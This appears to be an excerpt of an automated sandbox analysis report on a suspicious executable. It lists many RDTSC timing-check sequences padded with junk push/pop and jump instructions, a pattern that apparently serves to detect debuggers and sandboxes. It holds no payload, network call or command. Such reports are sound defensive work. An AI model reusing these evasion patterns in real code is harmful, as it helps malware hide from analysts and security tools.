Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71E679 second address: 71E683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71E683 second address: 71E689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71F19B second address: 71F1D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3B64CCE60Bh 0x0000000f jmp 00007F3B64CCE618h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71F1D0 second address: 71F1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71F74E second address: 71F754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 71F754 second address: 71F769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E95F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F3B648E95F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 66B8C9 second address: 66B8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B64CCE60Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7230A9 second address: 7230BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B648E95F6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7230BF second address: 7230E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F3B64CCE614h 0x0000000d jo 00007F3B64CCE606h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7230E3 second address: 7230F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3B648E95F6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7230F2 second address: 7230F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 723290 second address: 723294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 723694 second address: 7236AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7236AB second address: 7236B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7236B1 second address: 7236D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B64CCE622h 0x00000008 jmp 00007F3B64CCE616h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72FB5D second address: 72FB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72FB66 second address: 72FBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B64CCE617h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F3B64CCE60Fh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jng 00007F3B64CCE61Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a jnl 00007F3B64CCE606h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72FBA2 second address: 72FBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72FE5C second address: 72FE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B64CCE612h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72FE73 second address: 72FE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3B648E9603h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 730131 second address: 73014A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007F3B64CCE60Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73014A second address: 73014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73014E second address: 730152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73042D second address: 730437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3B648E95F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73109F second address: 7310A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7310A3 second address: 7310D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B648E9600h 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F3B648E95F6h 0x00000014 jmp 00007F3B648E9604h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73181A second address: 73181E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73181E second address: 731854 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3B648E95F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F3B648E9602h 0x00000015 push eax 0x00000016 jmp 00007F3B648E9603h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 731854 second address: 731866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE60Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72F58D second address: 72F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9604h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72F5A5 second address: 72F5CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE614h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007F3B64CCE606h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72F5CC second address: 72F5D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72F5D0 second address: 72F5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B64CCE606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 72F5DC second address: 72F5F3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B648E95FAh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007F3B648E95F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73561F second address: 735627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 735627 second address: 73563B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3B648E95FEh 0x00000008 jns 00007F3B648E95F6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73563B second address: 735641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 735641 second address: 735645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7389DA second address: 738A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 ja 00007F3B64CCE606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3B64CCE60Fh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 738A08 second address: 738A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73842B second address: 738454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F3B64CCE608h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F3B64CCE615h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 738454 second address: 73845A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 73845A second address: 738465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 738465 second address: 73847F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E95FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F3B648E95F6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7462AF second address: 7462BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jg 00007F3B64CCE606h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7479D7 second address: 7479DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7479DB second address: 7479EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3B64CCE606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F3B64CCE606h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74B1E9 second address: 74B1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74B1ED second address: 74B1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74B1F5 second address: 74B222 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B648E95FCh 0x00000008 jbe 00007F3B648E95FEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3B648E95FDh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74AD99 second address: 74AD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74D226 second address: 74D259 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F3B648E95F6h 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F3B648E95FCh 0x00000017 jnc 00007F3B648E95F6h 0x0000001d push esi 0x0000001e jmp 00007F3B648E9604h 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74D259 second address: 74D25E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 74D25E second address: 74D266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 751AD0 second address: 751AD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 67A80B second address: 67A838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9600h 0x00000009 jmp 00007F3B648E95FCh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3B648E95FAh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 67A838 second address: 67A842 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 67A842 second address: 67A84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 75A0DA second address: 75A11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3B64CCE613h 0x0000000a jl 00007F3B64CCE617h 0x00000010 jmp 00007F3B64CCE60Fh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3B64CCE60Eh 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 75A11B second address: 75A11F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 761305 second address: 76130F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B64CCE60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7615C7 second address: 7615CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 761852 second address: 761856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 761856 second address: 76185A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 76185A second address: 761865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7619EB second address: 7619EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 764B4C second address: 764B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 764B50 second address: 764B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 764B56 second address: 764B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 767A28 second address: 767A2D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 767A2D second address: 767A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F3B64CCE606h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 767614 second address: 767618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 776C8C second address: 776CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Dh 0x00000007 jmp 00007F3B64CCE618h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3B64CCE616h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 78403D second address: 784043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 784043 second address: 78407E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3B64CCE618h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F3B64CCE60Dh 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 78407E second address: 784084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 784084 second address: 78408A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 783BC3 second address: 783BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 783BD7 second address: 783BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 783BDD second address: 783BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 783BE1 second address: 783BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 783D4B second address: 783D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7865E7 second address: 786604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B64CCE619h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 786604 second address: 786625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9604h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 786625 second address: 786629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 786629 second address: 78664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3B648E9606h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 78880B second address: 788811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 788811 second address: 788815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79AEDE second address: 79AEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79AEE4 second address: 79AEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79AEEA second address: 79AEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
